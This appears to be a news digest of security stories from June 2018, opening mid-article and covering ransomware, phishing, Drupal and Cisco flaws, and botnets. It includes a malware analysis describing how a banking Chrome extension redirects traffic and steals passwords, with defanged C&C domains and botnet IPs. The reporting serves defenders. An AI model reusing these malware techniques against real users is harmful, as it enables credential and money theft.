Pichai set out seven principles for Google's application of artificial intelligence, or advanced computing that can simulate intelligent human behavior.

He said Google is using AI "to help people tackle urgent problems" such as prediction of wildfires, helping farmers, diagnosing disease or preventing blindness.

"We recognize that such powerful technology raises equally powerful questions about its use," Pichai said in the blog.

"How AI is developed and used will have a significant impact on society for many years to come. As a leader in AI, we feel a deep responsibility to get this right."

The chief executive said Google's AI programs would be designed for applications that are "socially beneficial" and "avoid creating or reinforcing unfair bias."

He said the principles also called for AI applications to be "built and tested for safety," to be "accountable to people" and to "incorporate privacy design principles."

Google will avoid the use of any technologies "that cause or are likely to cause overall harm," Pichai wrote.

That means steering clear of "weapons or other technologies whose principal purpose or implementation is to cause or directly facilitate injury to people" and systems "that gather or use information for surveillance violating internationally accepted norms."

The move comes amid growing concerns that automated or robotic systems could be misused and spin out of control, leading to chaos.

Several technology firms have already agreed to the general principles of using artificial intelligence for good, but Google appeared to offer a more precise set of standards.

The company, which is already a member of the Partnership on Artificial Intelligence including dozens of tech firms committed to AI principles, had faced criticism for the contract with the Pentagon on Project Maven, which uses machine learning and engineering talent to distinguish people and objects in drone videos.

Faced with a petition signed by thousands of employees and criticism outside the company, Google indicated the $10 million contract would not be renewed, according to media reports.


Facebook Admits Privacy Settings 'Bug' Affecting 14 Million Users
8.6.2018 securityweek
Social

Facebook acknowledged Thursday a software glitch that changed the settings of some 14 million users, potentially making some posts public even if they were intended to be private.

The news marked the latest in a series of privacy embarrassments for the world's biggest social network, which has faced a firestorm over the hijacking of personal data on tens of millions of users and more recently for disclosures on data-sharing deals with smartphone makers.

Erin Egan, Facebook's chief privacy officer, said in a statement that the company recently "found a bug that automatically suggested posting publicly when some people were creating their Facebook posts."

Facebook said this affected users posting between May 18 and May 27 as it was implementing a new way to share some items such as photos.

That left the default or suggested method of sharing as public instead of only for specific users or friends.

Facebook said it corrected the problem on May 22 but was unable to change all the posts, so is now notifying affected users.

"Starting today we are letting everyone affected know and asking them to review any posts they made during that time," Egan said.

"To be clear, this bug did not impact anything people had posted before -- and they could still choose their audience just as they always have. We'd like to apologize for this mistake."

Facebook confirmed earlier this week that China-based Huawei -- which has been banned by the US military and is a lightning rod for cyberespionage concerns -- was among device makers authorized to see user data in agreements that had been in place for years.

Facebook has claimed the agreements with some 60 device makers dating from a decade ago were designed to help the social media giant get more services into the mobile ecosystem.

Nonetheless, lawmakers expressed outrage that Chinese firms were given access to user data at a time when officials were trying to block their access to the US market over national security concerns.

The revelations come weeks after chief executive Mark Zuckerberg was grilled in Congress about the hijacking of personal data on some 87 million Facebook users by Cambridge Analytica, a consultancy working on Donald Trump's 2016 presidential campaign.


Drupal Refutes Reports of 115,000 Sites Still Affected by Drupalgeddon2
8.6.2018 securityweek
Vulnerebility

The Drupal Security Team has refuted reports that at least 115,000 websites are still vulnerable to Drupalgeddon2 attacks, arguing that the methodology used by the researcher who announced that number is flawed.

Researcher Troy Mursch recently conducted an analysis of websites running Drupal 7, the most widely used version of the content management system (CMS), and apparently found that many of them had still not patched the Drupalgeddon2 vulnerability.

Mursch identified nearly 500,000 Drupal 7 websites through the PublicWWW source code search engine and found that 115,070 had been running older versions of the CMS. The analysis showed that roughly 134,000 sites had not been vulnerable, while for 225,000 the version of Drupal they had been using could not be determined.

These numbers are apparently based on data from the publicly accessible “CHANGELOG.txt” file found on each website – sites using Drupal 7.58 or a later version were classified as not vulnerable while earlier versions were counted as affected.

“Checking the contents of CHANGELOG.txt is not a valid way to determine whether a site is vulnerable to any given attack vector,” the Drupal Security Team said in a statement posted on its website and sent out to journalists. “Patches distributed by the Drupal security team to fix the issues were widely used, but did not touch CHANGELOG.txt or any version strings defined elsewhere. There are also other mitigations that vendors have provided which would also not affect CHANGELOG.txt but would protect the site.”

“We believe the presented numbers to be inaccurate. We consider it to be misleading to draw conclusions from this sparse information,” it added.

In an update to his initial blog post, Mursch says it’s impossible to determine exactly how many Drupal websites are still vulnerable to Drupalgeddon2 attacks without actually attempting to exploit the vulnerability.

“While we know 115,000 sites are using outdated Drupal versions, based on the publically accessible CHANGELOG.txt found on each site, it’s possible someone applied a mitigation patch. However, the problem is we have no way of telling if they did unless we perform the actual exploit,” Mursch said.

“Unfortunately, attempting the exploit on nearly half a million sites would be highly illegal. Due to this, I won’t be performing the exploit or any variant of it to prove all the sites are vulnerable. The fact remains that each one of the 115,000 sites is using an outdated version Drupal,” he added.

Drupalgeddon2, tracked as CVE-2018-7600, allows a remote attacker to execute arbitrary code and take complete control of a website running Drupal 6, 7 or 8. The flaw has been patched with the release of versions 7.58, 8.5.1, 8.3.9 and 8.4.6, with fixes also available for the outdated Drupal 6.

Drupalgeddon2 has been exploited by malicious actors to deliver cryptocurrency miners, backdoors, RATs and tech support scams.

During the analysis of Drupalgeddon2, the Drupal Security Team and the developer who reported the original vulnerability identified another flaw. This second vulnerability, tracked as CVE-2018-7602 and dubbed by some Drupalgeddon3, has also been exploited in the wild.


Atlanta Says Further $9.5 Million Needed for Ransomware Recovery
8.6.2018 securityweek
Ransomware

Atlanta Ransomware Attack Was Far More Serious Than Originally Thought and Even Wiped Out the Police Dash-cam Recordings Archive

The City of Atlanta was struck by SamSam ransomware in March 2018. The ransom was set at $51,000 (in Bitcoin); but is believed not to have been paid. At that time, it was thought that some customer-facing applications and some internal services had been disrupted; but that no critical services had been affected.

One month later, it was reported that the cost of recovery from the attack had already reached nearly $3 million, and the city had not yet fully recovered.

Exactly what happened at Atlanta will not be known -- if it ever is -- until the work of the forensic investigators is complete. It is known, however, that the SamSam actors typically target their victims, gain access to the infrastructure, and interfere with processes before encrypting files. Hancock Health was hit by SamSam in January 2018. It paid the ransom, but a few days later, CEO Steve Long reported, "Though the electronic medical record backup files had not been touched, the core components of the backup files from all other systems had been purposefully and permanently corrupted by the hackers."

On Wednesday this week, Atlanta information management head Daphne Rackley told the City Council that the Atlanta ransomware attack was far more serious than originally thought. More than one-third of the 424 software programs used by the city remain off-line or at least partially disabled -- and almost 30% of those are considered 'critical'.

City attorney Nina Hickson, for example, said her office had lost more than 70 of its 77 computers and ten years of legal documents. Police Chief Erika Shields told local television news station WSB-TV 2 that the hack irretrievably wiped out the police dash-cam recordings archive.

The Atlanta City Council is preparing to vote on the fiscal budget 2019, and must do so by the end of the month. It has now been told by Rackley that her department is likely to require an additional $9.5 million over the coming year because of the ransomware.

The Atlanta incident is a wake-up call that highlights the ransom quandary. Paying the ransom feeds the criminal activity, puts a target on the victim's back for other criminals, and does not guarantee receipt of decryption keys. Not paying, however, will inevitably lead to recovery costs that could, for the unprepared, be extreme.

Atlanta seems to have been particularly unprepared. "I think that the true problem is not ransomware," comments Ilia Kolochenko, CEO of High-Tech Bridge. "The problem is unreliable, overcomplicated and insecure-by-design IT architecture. Segregation of duties, data and network access control, proper segmentation, daily backup, desktop hardening, anomaly detection -- are, de facto, a must-have in any modern company or governmental entity. Apparently, none were in place."

Effective disaster recovery and back-up systems can be particularly effective against extortion attacks. "Being able to easily and quickly recover data, like the dash-cam footage, from mere seconds before it was lost or disrupted can save an organization time, money and many other types of damage," says Gijsbert Janssen Van Doorn, technology evangelist at Zerto.

The Barnstable Police Department is a case in point. The small town Police Department on Massachusetts' Cape Cod was hit by ransomware in 2016 -- but an effective disaster recovery system meant the ransomware was mitigated and eradicated with a maximum downtime of less than 40 minutes, and no more than 2 minutes of lost data.

"Atlanta is now just another case study on what best practices need to be in place to protect an organization's CyberPosture," comments Mukul Kumar, CISO and VP of cyber practice at Cavirin. "They're already talking about direct costs in the tens of millions, but the indirect costs and other impacts are potentially much greater." The cost of prevention is inevitably less than the cost of cure.

Atlanta also demonstrates a dangerous escalation. A city is not merely an organization, it is part of the critical infrastructure. "The reality is that these are more lucrative targets than credit cards and people's identities when you look at it from an attacker perspective," warns Rishi Bhargava, co-founder at Demisto. "Attacks on cities, and our infrastructure, are like terrorist attacks and cities and governments will be willing to pay." He believes they must not.

The terrorist analogy is not lost on Kolochenko. This attack, he suggests, was "likely driven by a trivial itch for gain, but what would the outcome be if the attackers were a nation-state group? They can cause tremendous damage to the city, its infrastructure and citizens. I think the IT companies responsible for maintenance of the Atlanta critical IT infrastructure can be liable for negligence. Someone should be accountable for this."


Cisco Patches Severe Vulnerabilities in Prime Collaboration Provisioning
8.6.2018 securityweek
Vulnerebility

Cisco informed customers this week that it has patched one critical and five high severity vulnerabilities in Prime Collaboration Provisioning (PCP), a web-based provisioning solution that allows organizations to manage their communications services.

The critical flaw, CVE-2018-0321, allows a remote and unauthenticated attacker to access the Java Remote Method Invocation (RMI) system and perform actions that affect both the PCP and the devices connected to it.

The list of high severity vulnerabilities affecting PCP includes two issues that allow an unauthenticated attacker to reset the password on affected systems and gain admin-level privileges by sending a specially crafted password reset request.

Another high severity bug allows an unauthenticated attacker to execute arbitrary SQL queries. The remaining high severity vulnerabilities are access control issues that allow authenticated attackers to elevate their privileges.

Users can patch all the PCP vulnerabilities by updating to version 12.3, but fixes for some of these flaws are included in versions 12.1 and 12.2. The security holes have been identified by Cisco during internal security testing and there is no evidence of exploitation in the wild.

Cisco also fixed a critical vulnerability, tracked as CVE-2018-0315, it the authentication, authorization, and accounting (AAA) security services of Cisco IOS XE software. An attacker can exploit this flaw remotely to execute arbitrary code on a device or cause a denial-of-service (DoS) condition.

Other high severity problems patched this week include DoS vulnerabilities in IP Phone and Adaptive Security Appliance (ASA) products, a security bypass in Cisco Web Security Appliance (WSA), and a command execution vulnerability in Network Services Orchestrator (NSO).

Cisco’s advisories also describe an information disclosure bug in Meeting Server, and a DoS vulnerability impacting multiple products.

Patches are available for all these flaws and there is no evidence of malicious exploitation.


FIFA public Wi-Fi guide: which host cities have the most secure networks?
8.6.2018 Kaspersky Security
We all know how easy it is for users to connect to open Wi-Fi networks in public places. Well, it is equally straightforward for criminals to position themselves near poorly protected access points – where they can intercept network traffic and compromise user data.

A lack of essential traffic encryption for Wi-Fi networks where official and global activities are taking place – such as at locations around the forthcoming FIFA World Cup 2018 – offers especially fertile ground for criminals.

With this in mind, can football fans feel digitally safe in host cities? How does the situation with Wi-Fi access differ from town to town? To answer these questions, we have analyzed existing reliable and unreliable access points in 11 FIFA World Cup host cities – Saransk, Samara, Nizhny Novgorod, Kazan, Volgograd, Moscow, Ekaterinburg, Sochi, Rostov, Kaliningrad, and Saint Petersburg.

The main feature of the research is telemetry, which aims to secure users’ Wi-Fi connections and turn on VPNs when needed. Statistics were generated from users who voluntarily agreed to having their data collected. For the research, we only evaluated the security of public Wi-Fi spots. Even with relatively few public Wi-Fi spots in small towns, we still obtained a sufficient base for analysis – almost 32,000 Wi-Fi hotspots. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points.

Security of Wireless Networks in FIFA World Cup host cities
Using the methodology described above, we have evaluated the security of Wi-Fi access points in 11 FIFA World Cup 2018 host cities.

Encryption types used in public Wi-Fi hotspots in FIFA World Cup host cities

Over a fifth (22.4%) of Wi-Fi hotspots in FIFA World Cup 2018 host cities use unreliable networks. This means that criminals simply need to be located near an access point to grab the traffic and get their hands on user data.

Around three quarters of all access points use encryption based on the Wi-Fi Protected Access (WPA/WPA2) protocol family, which is considered to be one of the most secure. The level of protection mostly depends on the settings, such as the strength of the password set by the hotspot owner. The complicated encryption key can take years to successfully hack.

It should also be noted that even reliable networks, like WPA2, cannot be automatically considered as totally secure. They still give in to brute-force, dictionary, and key reinstallation attacks, of which there are a large number of tutorials and open source tools available online. Any attempt to intercept traffic from WPA Wi-Fi in public access points can also be made by penetrating the gap between the access point and the device at the beginning of the session.

Encryption types used in public Wi-Fi hotspots in FIFA World Cup host cities

The safest city (in terms of public Wi-Fi) turned out to be Saransk, with 72% of access points secured by WPA/WPA2 protocol encryption.

The top-three cities with the highest proportion of unsecured connections are Saint Petersburg (48% of Wi-Fi access points are unsecured), Kaliningrad (47%) and Rostov (44%).

Again, the relativity of the results should be noted. Even a WPA2 connection in a cafe couldn’t be considered as secure, if the password is visible to everyone. Nevertheless, we believe that the methodology used represents the Wi-Fi hot-spot security situation in the host cities, with a fair degree of accuracy.

The results of this research show that the security of Wi-Fi connections in FIFA World Cup hosts cities varies. Therefore. We therefore recommend that users follow some key safety rules.

Recommendations for Users
If you are going to visit any of the FIFA World Cup 2018 host cities and use open Wi-Fi networks while you are there, remember to follow these simple rules to help protect your personal data:

Whenever possible, connect via a Virtual Private Network (VPN). With a VPN, encrypted traffic is transmitted over a protected tunnel, meaning that criminals won’t be able to read your data, even if they gain access to it. For example, the Kaspersky Secure Connection VPN solution can switch on automatically when a connection is not safe.
Do not trust networks that are not password-protected, or have easy-to-guess or easy-to-find passwords.
Even if a network requests a strong password, you should remain vigilant. Fraudsters can find out the network password at a coffee shop, for example, and then create a fake connection using the same password. This allows them to easily steal personal user data. You should only trust network names and passwords given to you by the employees of an establishment.
To maximize your protection, turn off your Wi-Fi connection whenever you are not using it. This will also save your battery life. We recommend you also disable automatic connections to existing Wi-Fi networks.
If you are not 100% sure that the wireless network you are using is secure, but you still need to connect to the Internet, try to limit yourself to basic user actions such as searching for information. You should refrain from entering your login details for social networks or mail services, and definitely do not perform any online banking operations or enter your bank card details anywhere. This will avoid situations where your sensitive data or passwords are intercepted and then used for malicious purposes later on.
To avoid becoming a cybercriminal target, you should enable the “Always use a secure connection” (HTTPS) option in your device settings. Enabling this option is recommended when visiting any websites you think may lack the necessary protection.
One example of a dedicated solution is the Secure Connection tool included in the latest versions of Kaspersky Internet Security and Kaspersky Total Security. This module protects users who are connected to Wi-Fi networks by providing them with a secure encrypted connection channel. Secure Connection can be launched manually or, depending on the settings, activated automatically when connecting to public Wi-Fi networks, when navigating to online banking and payment systems or online stores, and when communicating online (via mail services, social networks, etc.).


A MitM extension for Chrome
8.6.2018 Kaspersky
Virus
Browser extensions make our lives easier: they hide obtrusive advertising, translate text, help us choose in online stores, etc. There are also less desirable extensions, including those that bombard us with advertising or collect information about our activities. These pale into insignificance, however, when compared to extensions whose main aim is to steal money. To protect our customers, we automatically process large numbers of extensions from a variety of sources. This includes downloading and analyzing suspicious extensions from Chrome Web Store. One extension, in particular, recently caught our attention because it communicated with a suspicious domain.

The Google Chrome extension named Desbloquear Conteúdo (which means ‘Unblock Content’ in Portuguese) targeted users of Brazilian online banking services – all the attempted installations that we traced occurred in Brazil. The aim of this malicious extension is to harvest user logins and passwords and then steal money from their bank accounts. Kaspersky Lab products detect the extension as HEUR:Trojan-Banker.Script.Generic.

Geographic distribution of security product detections of the script fundo.js, one of the extension components

By the time of publication, the malicious extension had already been removed from Chrome Web Store.

The malicious extension in Chrome Web Store

Analysis of malicious extension
Malicious browser extensions often use different techniques (e.g. obfuscation) to prevent detection by security software. The developers of this specific extension, however, didn’t obfuscate its source code, opting instead for a different approach. This piece of malware uses the WebSocket protocol for data communication, making it possible to exchange messages with the C&C server in real time. This means the C&C starts acting as a proxy server to which the extension redirects traffic when the victim visits the site of a Brazilian bank. Essentially, this is a man-in-the-middle attack.

The Desbloquear Conteúdo extension consists of two JS scripts. Let’s take a closer look at them.

fundo.js
The first thing that catches the eye in the script’s code is the function websocket_init(). This is where a WebSocket connection is established. Data is then downloaded from the server (ws://exalpha2018[.]tk:2018) and saved to chrome.storage under the key ‘manualRemovalStorage’.

Download of data from C&C via a WebSocket connection

Data downloaded and saved by the extension

As a result of contacting hxxp://exalpha2018[.]tk/contact-server/?modulo=get, the extension receives the IP address to which user traffic will be redirected.

IP address received from C&C server

The IP to which all user traffic is then redirected

It’s worth mentioning here the Proxy Auto Configuration technology. Modern browsers use a special file written in JavaScript which has just one function: FindProxyForURL. With this function, the browser defines which proxy server to use to establish a connection to various domains.

The fundo.js script uses the Proxy Auto Configuration technology at the time of the function call implement_pac_script. This results in the function FindProxyForURL being replaced with a new one that redirects user traffic to the malicious server, but only when a user visits the web page of a Brazilian bank.

Changing browser settings to redirect user traffic

pages.js
In this script, the following section of code is the most important:

Execution of the downloaded malicious code on web pages belonging to banks

Just like with fundo.js, data downloaded from the server is saved to manualRemovalStorage. The data includes the domains of several Brazilian banks and the code the browser should execute if a user visits one of the relevant sites.

pages.js downloads the following scripts from the domain ganalytics[.]ga and launches them on the banks’ sites:

ganalytics[.]ga/bbf.js,
ganalytics[.]ga/bbj.js,
ganalytics[.]ga/cef.js,
ganalytics[.]ga/itf.js,
ganalytics[.]ga/itf_new.js.

Web Antivirus detection statistics for attempts to contact ganalytics[.]ga

All the above scripts have similar functionalities and are designed to steal the user’s credentials. Let’s take a look at one of them.

cef.js
One of this script’s functions is to add specific HTML code to the main page of the online banking system.

Addition of malicious code to the web page

A closer look at the code that’s returned after contacting the server reveals that it’s needed to collect the one-time passwords used for authentication on the bank’s site.

Interception of users’ one-time passwords

If a user is on the page where logins and passwords are entered, the script creates a clone of the ‘Enter’ button. A function is also created to click this button. The password is stored in the cookie files of this function for subsequent transfer to the C&C and the real button, which is overlaid and hidden from the victim, is then clicked.

Copy of the ‘Enter’ button is created and the login and password for an online banking service are intercepted

As a result, the password to the user’s account is sent to the online banking system as well as to the malicious server.

Sending of all intercepted data to the C&C

Additional analysis of the web resources used in the attack (courtesy of the KL Threat Intelligence Portal) yields some interesting information. In particular, the aforementioned ganalytics[.]ga is registered in the Gabon domain zone, which is why WHOIS services don’t provide much information about it:

WHOIS info for ganalytics[.]ga

However, the IP address where it’s hosted is also associated with several other interesting domains.

A fragment of DNS data from KSN

It’s clear that this IP address is (or was) associated with several other domains with tell-tale names containing the keywords advert, stat, analytic and registered in Brazil’s domain zone. It’s noteworthy that many of them were involved in distributing web miners last autumn, with the mining scripts being downloaded when legitimate Brazilian bank sites were visited.

Fragments of KSN data related to advstatistics.com[.]br

When malware is loaded while the user is visiting a legitimate site, it usually indicates that traffic is being modified locally on the user’s computer. Other things about this case, namely the fact that it targeted Brazilian users and that it used the same IP address that was used in previous attacks, suggest that this browser extension (or related versions of it) earlier had functionality to add cryptocurrency mining scripts to the banking sites users were visiting at the moment the extension was downloaded to their devices.

Conclusion
Browser extensions designed to steal logins and passwords are quite rare. However, they need to be taken seriously given the potential damage they could cause. We recommend that users only install verified extensions with large numbers of installations and reviews in Chrome Web Store or another official service. In spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published in them – we’ve covered one such case. Also, it wouldn’t hurt to have a security product installed on your device that issues a warning whenever an extension acts suspiciously.


2018 Fraud World Cup
8.6.2018 Kaspersky CyberCrime

There are only two weeks to go before the start of the massive soccer event — FIFA World Cup. This championship has already attracted the attention of millions worldwide, including a fair few cybercriminals. Long before kick-off, email accounts began bulging with soccer-related spam, and scammers started exploiting the topic in mailings and creating World Cup-themed phishing pages.

Our statistics show spikes in the number of phishing pages during match ticket sales. Every time tickets went on sale, fraudsters mailed out spam and activated clones of official FIFA pages and sites offering fake giveaways allegedly from partner companies. But as the event draws nearer, cyber scams are reaching fever pitch. We present our observations below.

Fake lottery win notifications
One of the main types of World Cup-related email fraud is spam informing recipients of cash winnings in lotteries supposedly held by official partners and sponsors (Visa, Coca-Cola, Microsoft, etc.), as well as FIFA itself.

Examples of fake lottery win notifications

Such messages contain attachments (usually PDF or DOCX documents) in which the “winner” is congratulated and told to forward detailed contact details (name, date of birth, address, email, telephone no.) in order to receive the prize. Sometimes recipients are asked to pay a part of the postage or bank transfer fees.

Such mailouts are aimed primarily at harvesting user data (including financial), plus picking up a small money transfer. Such messages can also contain malicious attachments, for example, Trojan-Banker programs.

Examples of fake notifications with attached documents

Another type of common spam fraud is an offer to take part in a ticket giveaway or win a trip to a match. Victims are required either to register on a fake promotion page and provide an email address, or, as in the case of lottery emails, to send the “organizers” their contact details. Such messages are sent in the name of FIFA, usually from addresses on recently registered domains. The purpose of such schemes is mainly to update email databases so as to distribute yet more spam.

Examples of messages with ticket and trip giveaways

Advertising spam
In the runup to the championship, we registered a lot of advertising spam with offers for soccer merchandise, transport/accommodation services, and travel packages from various tour operators. Merchandise was generally offered by small online retailers and included toys, souvenirs, and stationery marked with official logos, as well as soccer jerseys for all teams taking part. Some messages even resemble mailings from the official FIFA store.

Examples of messages offering merchandise

There were also spammings unrelated to soccer. For example, traditional spam offering medical products, but using the World Cup to attract attention. Interestingly, the message subject referred to the 2006 World Cup final. Perhaps the spammers used an old template and forgot to change the date.

Wrong year, same product

Ticket sales
Besides online stores selling merchandise, there are plenty of sites offering match tickets, both fake and real. But real doesn’t necessarily mean bona fide: they are often sold by ticket scalpers exploiting various loopholes in the FIFA rules.

Online scalpers selling tickets for an arm and a leg

However, official tickets can only be bought on the official FIFA website, and large fines are imposed for their illegal sale or resale. Those who use the services of speculators risk being turned away at the stadium: tickets are personalized, and if the bearer fails to show ID matching the information in the ticket, FIFA staff have the right to refuse entry.

Fake sites and messages from partners
One of the most popular ways to steal credentials for bank and other accounts is to create counterfeit imitations of official partner websites. Partner organizations quite often arrange ticket giveaways for clients, and this is what attackers exploit to lure users onto fake promotion sites. Such pages look very convincing: well-designed with a working interface, hard to tell from the real thing.

Phishing login page supposedly of a partner bank

Attempt to gain access to an account on a partner company site under the guise of a ticket giveaway

Scammers also try to extract data by mimicking official FIFA notifications. The victim is informed that the security system has been updated and all personal data must be re-entered to avoid lockout. The link in the message takes the victim far away from FIFA to a fake personal account. Naturally, all data entered flows straight to the scammers.

Example of a phishing email seemingly from FIFA

Cybercriminals are particularly keen to target clients of Visa, the tournament’s commercial sponsor, and offer prize giveaways in the name of this international payment heavyweight. To take part, users need to follow a link that unsurprisingly points to a phishing site (the domain was registered a couple of months ago and has nothing to do with the payment system), where they are asked to enter their bank card details, including the CVV/CVC code.

Example of a message and phishing page in the name of Visa

Fraud allsorts
Alongside social engineering, phishers deploy malicious programs in the pursuit of users’ personal data and cash. For example, a fake site offering online broadcasts can plant malware on the victim’s computer under the guise of a Flash Player update required to view the match.

In some cases, phishers have no interest at all in bank accounts and payment details. For instance, under the pretext of receiving a World Cup-themed update for the video game FIFA Soccer, users are prompted to enter their account credentials for the Origin platform on a fake login page. If there are games of interest under the victim’s profile, the cybercriminals change the login/password and link the account to a new email address for subsequent resale.

Fake Origin login page

In late May, a few weeks before the start of the championship, phishing emails offering cheap flights from the major airlines were all the rage. In addition to fake soccer ticket giveaways, there were draws seemingly on behalf of airlines offering free plane tickets.

Fake ticket giveaway in the name of a major airline

Tricks of the trade
To make their sites seem credible, cybercriminals register domain names combining the words “world,” “worldcup,” “FIFA,” “Russia,” etc. (for example: worldcup2018, russia2018, fifarussia). Normally, though not always, such domains look unnatural (for instance, fifa.ucozx.site) and have a non-standard domain extension. So in most cases, a close look at the link in the email or the URL after opening the site should be enough to avoid the bait.

DNS WHOIS data for phishing sites

Likewise with a view to lulling user vigilance, cybercriminals acquire the cheapest SSL certificates available: relevant authorities often fail to verify the existence of the entity acquiring the certificate, meaning that the scammers get the all-important HTTPS in front of their address. To spot a fake, it is enough to look at the domain’s WHOIS data. Scam websites tend to have been registered quite recently and for a short time, and their owners are usually private individuals. What’s more, detailed information about the owner is often hidden.

Besides active domain names, we logged a large number of “sleepers”: on them you might find a placeholder page, if that. Cybercriminals use them as a backup: if one domain is blocked, the site moves to the next.

Examples of backup domain names

Conclusion
The above describes only the most popular scams exploiting the World Cup theme. Nevertheless, it provides a fairly complete picture of how cybercriminals operate and what they want. In addition to the above, we expect shortly to see an explosion of phishing sites offering cheap airline tickets to World Cup host cities, as well as fake mailings supposedly from popular accommodation services with “special offers.”

To avoid being duped, follow these simple rules:

Buy tickets only on the official FIFA website or at official ticket offices.
For online purchases (not only during the tournament), get a separate bank card and set a spending limit.
Do not open links or attachments in emails from unknown senders, even if they seem legitimate.
Check the addresses of links in notifications from known services; at the slightest suspicion, do not click, but open the site manually in the browser.
To preserve your money and nerves, never buy products advertised in spam.
Use the latest security solutions to protect against cyberthreats, and keep the databases up-to-date.


Marcus Hutchins, WannaCry-killer, hit with four new charges by the FBI
8.6.2018 thehackernews  Crime


Marcus Hutchins, the British malware analyst who helped stop global Wannacry menace, is now facing four new charges related to malware he allegedly created and promoted it online to steal financial information.
Hutchins, the 24-year-old better known as MalwareTech, was arrested by the FBI last year as he was headed home to England from the DefCon conference in Las Vegas for his alleged role in creating and distributing Kronos between 2014 and 2015.
Kronos is a Banking Trojan designed to steal banking credentials and personal information from victims' computers, which was sold for $7,000 on Russian online forums, and the FBI accused Hutchins of writing and promoting it online, including via YouTube.


Hutchins pleaded not guilty at a court hearing in August 2017 in Milwaukee and release on $30,000 bail.
However, earlier this week, a revised superseding indictment [PDF] was filed with the Wisconsin Eastern District Court, under which Hutchins faces four new charges along with the six prior counts filed against him by the FBI a month before his arrest.
Marcus Accused of Creating and Selling Another Malware
According to the new indictment, Hutchins created a second piece of malware, known as "UPAS Kit," and also lied to the Federal Bureau of Investigations (FBI) when he was arrested and questioned last year in Las Vegas.
As described by prosecutors, UPAS Kit is Spybot virus that "allowed for the unauthorized exfiltration of information from protected computers" and "used a form grabber and web injects to intercept and collect personal information," including credit card details.
UPAS Kit advertised to "install silently and not alert antivirus engines," for prices ranged above $1,000 back in 2012.
According to the indictment, Hutchins created UPAS Kit in 2012, when he was just 18, and sold it online to another unnamed co-defendant identified as "VinnyK" (aka Aurora123), who was also involved in promoting Kronos.


VinnyK then sold UPAS Kit to another person in Wisconsin in 2012, who allegedly used the malware to attack computers in the United States.
Two other charges relate to Hutchins "aiding and abetting" the distribution of invasive code in an attempt to damage "10 or more protected computers," and helping others to hack computers for financial gain.
Marcus Appealed to his Followers for Donations to Cover Legal Costs
As the news on the revised indictment broke, Hutchins, who has repeatedly denied any illegal activity, called the charges "bullshit" and appealed to his Twitter followers for donations to cover legal costs.
"Spend months and $100k+ fighting this case, then they go and reset the clock by adding even more bullshit charges like 'lying to the FBI,'" Hutchins wrote on his Twitter, calling for donations by adding a quote from Starcraft video game: "We require more minerals."
Hutchins' lawyer Brian Klein called the charges "meritless" and said he expects his client to be cleared of all charges.
"[We] are disappointed the govt has filed this superseding indictment, which is meritless," Klein tweeted. "It only serves to highlight the prosecution's serious flaws. We expect [Hutchins] to be vindicated and then he can return to keeping us all safe from malicious software."
Hutchins, who is living in Los Angeles on bail, is unable to leave the United States since last year due to his pending criminal charges.
Hutchins stormed to fame and hailed as a hero earlier last year when he accidentally stopped a global epidemic of the WannaCry ransomware attack that crippled computers all across the world.


Over 115,000 Drupal Sites Still Vulnerable to Drupalgeddon2 Exploit
8.6.2018 thehackernews 
Exploit

Hundreds of thousands of websites running on the Drupal CMS—including those of major educational institutions and government organizations around the world—have been found vulnerable to a highly critical flaw for which security patches were released almost two months ago.
Security researcher Troy Mursch scanned the whole Internet and found over 115,000 Drupal websites are still vulnerable to the Drupalgeddon2 flaw despite repetitive warnings.


Drupalgeddon2 (CVE-2018-7600) is a highly critical remote code execution vulnerability discovered late March in Drupal CMS software (versions < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1) that could allow attackers to completely take over vulnerable websites.
For those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or standard Drupal installations under the privileges of the user.
Since Drupalgeddon2 had much potential to derive attention of motivated attackers, the company urged all website administrators to install security patches immediately after it was released in late March and decided not to release any technical details of the flaw initially.

However, attackers started exploiting the vulnerability only two weeks after complete details and proof-of-concept (PoC) exploit code of Drupalgeddon2 was published online, which was followed by large-scale Internet scanning and exploitation attempts.


Shortly after that, we saw attackers developed automated exploits leveraging Drupalgeddon 2 vulnerability to inject cryptocurrency miners, backdoors, and other malware into websites, within few hours after it's detailed went public.
Mursch scanned the Internet and found nearly 500,000 websites were running on Drupal 7, out of which 115,070 were still running an outdated version of Drupal vulnerable to Drupalgeddon2.
While analyzing vulnerable websites, Mursch noticed that hundreds of them—including those of Belgium police department, Colorado Attorney General office, Fiat subsidiary Magneti Marelli and food truck locating service—have already been targeted by a new cryptojacking campaign.
Mursch also found some infected websites in the campaign that had already upgraded their sites to the latest Drupal version, but the cryptojacking malware still existed.
We have been warning users since March that if you are already infected with the malware, merely updating your Drupal website would not remove the "backdoors or fix compromised sites." To fully resolve the issue you are recommended to follow this Drupal guide.


IoT Botnets Found Using Default Credentials for C&C Server Databases
8.6.2018 thehackernews  IoT  BotNet

Not following cybersecurity best practices could not only cost online users but also cost cybercriminals. Yes, sometimes hackers don't take best security measures to keep their infrastructure safe.
A variant of IoT botnet, called Owari, that relies on default or weak credentials to hack insecure IoT devices was found itself using default credentials in its MySQL server integrated with command and control (C&C) server, allowing anyone to read/write their database.
Ankit Anubhav, the principal security researcher at IoT security firm NewSky Security, who found the botnets, published a blog post about his findings earlier today, detailing how the botnet authors themselves kept an incredibly week username and password combination for their C&C server's database.


Guess what the credentials could be?
Username: root
Password: root
These login credentials helped Anubhav gain access to the botnet and fetch details about infected devices, the botnet authors who control the botnet and also some of their customers (a.k.a. black box users), who have rented the botnet to launch DDoS attacks.
"Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the botmaster is available) and cooldown time (time interval between the two attack commands) can also be observed," Anubhav wrote.

Besides this, Anubhav was also able to see the duration limit of the attack such as for how long a client can perform the DDoS attack, maximum available bots for an attack, and the list of various IPs targeted by the DDoS attack.
Anubhav also found another botnet, which was also built with a version of Owari and its database was also exposed via weak credentials.
The C&C servers of both the botnets were located at 80.211.232.43 and 80.211.45.89, which are now offline, as "botnet operators are aware that their IPs will be flagged soon due to the bad network traffic," Anubhav wrote. "Hence to stay under the radar, they often voluntarily change attack IPs."


All New Privacy and Security Features Coming in macOS 10.14 Mojave
8.6.2018 thehackernews  Apple

At Worldwide Developer Conference 2018 on Monday, Apple announced the next version of its macOS operating system, and it's called Mojave.
